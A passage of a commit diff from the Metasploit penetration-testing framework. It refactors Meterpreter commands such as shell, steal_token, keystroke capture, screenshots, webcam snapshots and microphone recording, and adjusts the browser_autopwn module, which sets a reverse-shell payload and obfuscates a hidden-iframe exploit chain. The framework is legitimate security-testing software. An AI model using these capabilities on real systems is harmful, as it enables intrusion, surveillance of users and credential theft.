+ "shell" => "Drop into a system command shell",
+ "shutdown" => "Shuts down the remote computer",
+ "steal_token" => "Attempts to steal an impersonation token from the target process",
+ "sysinfo" => "Gets information about the remote system, such as OS",
}
+ reqs = {
+ "clearev" => [ "stdapi_sys_eventlog_open", "stdapi_sys_eventlog_clear" ],
+ "drop_token" => [ "stdapi_sys_config_drop_token" ],
+ "execute" => [ "stdapi_sys_process_execute" ],
+ "getpid" => [ "stdapi_sys_process_getpid" ],
+ "getprivs" => [ "stdapi_sys_config_getprivs" ],
+ "getuid" => [ "stdapi_sys_config_getuid" ],
+ "kill" => [ "stdapi_sys_process_kill" ],
+ "ps" => [ "stdapi_sys_process_get_processes" ],
+ "reboot" => [ "stdapi_sys_power_exitwindows" ],
+ "reg" => [
+ "stdapi_registry_load_key",
+ "stdapi_registry_unload_key",
+ "stdapi_registry_open_key",
+ "stdapi_registry_open_remote_key",
+ "stdapi_registry_create_key",
+ "stdapi_registry_delete_key",
+ "stdapi_registry_close_key",
+ "stdapi_registry_enum_key",
+ "stdapi_registry_set_value",
+ "stdapi_registry_query_value",
+ "stdapi_registry_delete_value",
+ "stdapi_registry_query_class",
+ "stdapi_registry_enum_value",
+ ],
+ "rev2self" => [ "stdapi_sys_config_rev2self" ],
+ "shell" => [ "stdapi_sys_process_execute" ],
+ "shutdown" => [ "stdapi_sys_power_exitwindows" ],
+ "steal_token" => [ "stdapi_sys_config_steal_token" ],
+ "sysinfo" => [ "stdapi_sys_config_sysinfo" ],
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
+
+ all
end
#
View
40 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
@@ -20,20 +20,50 @@ class Console::CommandDispatcher::Stdapi::Ui
# List of supported commands.
#
def commands
- {
- "idletime" => "Returns the number of seconds the remote user has been idle",
- "uictl" => "Control some of the user interface components",
+ all = {
"enumdesktops" => "List all accessible desktops and window stations",
"getdesktop" => "Get the current meterpreter desktop",
- "setdesktop" => "Change the meterpreters current desktop",
+ "idletime" => "Returns the number of seconds the remote user has been idle",
+ "keyscan_dump" => "Dump the keystroke buffer",
"keyscan_start" => "Start capturing keystrokes",
"keyscan_stop" => "Stop capturing keystrokes",
- "keyscan_dump" => "Dump the keystroke buffer",
"screenshot" => "Grab a screenshot of the interactive desktop",
+ "setdesktop" => "Change the meterpreters current desktop",
+ "uictl" => "Control some of the user interface components",
# not working yet
# "unlockdesktop" => "Unlock or lock the workstation (must be inside winlogon.exe)",
}
+
+ reqs = {
+ "enumdesktops" => [ "stdapi_ui_desktop_enum" ],
+ "getdesktop" => [ "stdapi_ui_desktop_get" ],
+ "idletime" => [ "stdapi_ui_get_idle_time" ],
+ "keyscan_dump" => [ "stdapi_ui_get_keys" ],
+ "keyscan_start" => [ "stdapi_ui_start_keyscan" ],
+ "keyscan_stop" => [ "stdapi_ui_stop_keyscan" ],
+ "screenshot" => [ "stdapi_ui_desktop_screenshot" ],
+ "setdesktop" => [ "stdapi_ui_desktop_set" ],
+ "uictl" => [
+ "stdapi_ui_enable_mouse",
+ "stdapi_ui_disable_mouse",
+ "stdapi_ui_enable_keyboard",
+ "stdapi_ui_disable_keyboard",
+ ],
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
+
+ all
end
#
View
20 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -20,11 +20,29 @@ class Console::CommandDispatcher::Stdapi::Webcam
# List of supported commands.
#
def commands
- {
+ all = {
"webcam_list" => "List webcams",
"webcam_snap" => "Take a snapshot from the specified webcam",
"record_mic" => "Record audio from the default microphone for X seconds"
}
+ reqs = {
+ "webcam_list" => [ "webcam_list" ],
+ "webcam_snap" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
+ "record_mic" => [ "webcam_record_audio" ],
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
+
+ all
end
#
View
9 lib/rex/text.rb
@@ -239,6 +239,15 @@ def self.to_unescape(data, endian=ENDIAN_LITTLE)
return buff
end
+ def self.to_octal(str, prefix = "\\")
+ octal = ""
+ str.each_byte { |b|
+ octal << "#{prefix}#{b.to_s 8}"
+ }
+
+ return octal
+ end
+
#
# Returns the hex version of the supplied string
#
View
20 modules/auxiliary/server/browser_autopwn.rb
@@ -60,6 +60,11 @@ def initialize(info = {})
],
'PassiveActions' =>
[ 'WebServer', 'DefangedDetection' ],
+ 'DefaultOptions' => {
+ # We know that most of these exploits will crash the browser, so
+ # set the default to run migrate right away if possible.
+ "InitialAutoRunScript" => "migrate -f",
+ },
'DefaultAction' => 'WebServer'))
register_options([
@@ -69,9 +74,6 @@ def initialize(info = {})
], self.class)
register_advanced_options([
- # We know that most of these exploits will crash the browser, so
- # set the default to run migrate right away if possible.
- OptString.new('InitialAutoRunScript', [false, "An initial script to run on session created (before AutoRunScript)", 'migrate -f']),
OptString.new('AutoRunScript', [false, "A script to automatically on session creation.", '']),
OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
OptString.new('MATCH', [false,
@@ -109,7 +111,7 @@ def initialize(info = {})
'The port to use for generic reverse-connect payloads', 6666
]),
OptString.new('PAYLOAD_GENERIC', [false,
- 'The payload to use for generic reverse-connect payloads6',
+ 'The payload to use for generic reverse-connect payloads',
'generic/shell_reverse_tcp'
]),
OptPort.new('LPORT_JAVA', [false,
@@ -703,14 +705,14 @@ def build_script_response(cli, request)
str = '';
str += '<iframe src="' + myframe + '" style="visibility:hidden" height="0" width="0" border="0"></iframe>';
document.body.innerHTML += (str);
- }
- window.next_exploit = function (exploit_idx) {
+ };
+ window.next_exploit = function(exploit_idx) {
#{js_debug("'next_exploit(' + exploit_idx +')<br>'")}
if (!global_exploit_list[exploit_idx]) {
#{js_debug("'End<br>'")}
return;
}
- #{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + '<br>'")}
+ #{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + ' of ' + global_exploit_list.length + '<br>'")}
// Wrap all of the vuln tests in a try-catch block so a
// single borked test doesn't prevent other exploits
// from working.
@@ -739,7 +741,7 @@ def build_script_response(cli, request)
#{js_debug("'test threw an exception: ' + e.message + '<br />'")}
window.next_exploit(exploit_idx+1);
};
- }
+ };
ENDJS
sploits_for_this_client = []
@@ -828,7 +830,7 @@ def build_script_response(cli, request)
js << "window.next_exploit(0);\n"
js = ::Rex::Exploitation::JSObfu.new(js)
- js.obfuscate
+ js.obfuscate unless datastore["DEBUG"]
response.body = "#{js}"
View
3  modules/exploits/multi/browser/java_rhino.rb
@@ -13,6 +13,9 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::Remote::BrowserAutopwn
+ autopwn_info({ :javascript => false })
+
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',
View
15 modules/post/osx/gather/enum_adium.rb
@@ -224,21 +224,14 @@ def dir(path)
# and retry under certain conditions.
#
def exec(cmd)
- tries = 0
begin
out = cmd_exec(cmd).chomp
rescue ::Timeout::Error => e
- tries += 1
- if tries < 3
- vprint_error("#{@peer} - #{e.message} - retrying...")
- retry
- end
+ vprint_error("#{@peer} - #{e.message} - retrying...")
+ retry
rescue EOFError => e
- tries += 1
- if tries < 3
- vprint_error("#{@peer} - #{e.message} - retrying...")
- retry
- end
+ vprint_error("#{@peer} - #{e.message} - retrying...")
+ retry
end
end
View
2  test/modules/post/test/file.rb
@@ -1,5 +1,5 @@
-require 'module_test'
+require 'test/lib/module_test'
#load 'test/lib/module_test.rb'
#load 'lib/rex/text.rb'
View
25 test/modules/post/test/meterpreter.rb
@@ -3,8 +3,7 @@
require 'rex'
$:.push "test/lib" unless $:.include? "test/lib"
-#require 'module_test'
-load 'test/lib/module_test.rb'
+require 'module_test'
class Metasploit4 < Msf::Post
@@ -38,6 +37,11 @@ def test_sys_config
end
def test_net_config
+ unless (session.commands.include? "stdapi_net_config_get_interfaces")
+ vprint_status("This meterpreter does not implement get_interfaces, skipping tests")
+ return
+ end
+
vprint_status("Starting networking tests")
it "should return network interfaces" do
@@ -160,16 +164,19 @@ def test_fs
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
- res &&= session.fs.dir.entries.include?(remote)
+ res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res
- session.fs.file.download(remote, remote)
- res &&= ::File.file? remote
- downloaded_contents = ::File.read(remote)
+ fd = session.fs.file.new(remote, "rb")
+ uploaded_contents = fd.read
+ until (fd.eof?)
+ uploaded_contents << fd.read
+ end
+ fd.close
original_contents = ::File.read(local)
- res &&= !!(downloaded_contents == original_contents)
- ::File.unlink remote
+
+ res &&= !!(uploaded_contents == original_contents)
end
session.fs.file.rm(remote)
@@ -183,7 +190,7 @@ def test_fs
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
- res &&= session.fs.dir.entries.include?(remote)
+ res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res
View
2  test/modules/post/test/unix.rb
@@ -1,5 +1,5 @@
-require 'module_test'
+require 'test/lib/module_test'
#load 'test/lib/module_test.rb'
#load 'lib/rex/text.rb'
Please sign in to comment.
Something went wrong with that request. Please try again.